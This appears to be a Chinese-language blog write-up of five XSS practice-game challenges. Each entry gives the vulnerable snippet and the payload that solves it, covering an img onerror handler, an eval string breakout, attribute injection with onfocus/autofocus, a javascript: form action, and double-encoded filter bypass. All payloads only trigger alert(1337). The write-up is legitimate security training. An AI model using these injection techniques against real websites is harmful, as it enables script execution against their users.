xss 漏洞复现
一,xss game
1,源码
<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>题目分析:接收somebody参数放入innerHTML,然后放在
标签展示。innerHTML标签中警用了script标签,所以使用标签。
?somebody=<img src=1 onerror="alert(1337)">
2,源码
<!-- Challenge -->
<h2 id="maname"></h2>
<script>
let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
let ma = ""
eval(`ma = "Ma name ${jeff}"`)
setTimeout(_ => {
maname.innerText = ma
}, 1000)
</script>
//eval(`ma = "Ma name a";alert(1337);""`)题目分析:innertext会把<>当成字符串解析,安全系数很高,此题危险方法是eval,进行闭合操作。
思路一 ?jeff=a";alert(1337);"
思路二 ?jeff=a"-alert(1337);-" 连接符
?jeff=a"-alert(1337);"3,源码
<!-- Challenge -->
<div id="uganda"></div>
<script>
let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
wey = wey.replace(/[<>]/g, '') //过滤了<>
uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>题目分析:闭合"${wey}"处的双引号,加入我们的方法。
?wey=aaa"%20onfocus=alert(1337)%20autofocus="
autofocus自动对焦
onfocus=alert(1337) 焦点存在时触发函数4,源码
<!-- Challenge -->
<form id="ricardo" method="GET">
<input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
setTimeout(_ => {
ricardo.submit()
}, 2000) //两秒后自动提交
</script>题目分析:表单的action处也会出现相应的伪协议事件,需要提交触发。
?ricardo=javascript:alert(1337)5,源码
<!-- Challenge -->
<h2 id="will"></h2>
<script>
smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
smith = smith.replace(/[\(\`\)\\]/g, '')
will.innerHTML = smith
</script>题目分析:过滤了()`\ 双层编码() %2528 %2529 浏览器会转一次。加location识别编码
?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">img%20src=1%20οnerrοr=location="javascript:alert%25281337%2529">
[外链图片转存中...(img-INiW5cpV-1724041595122)]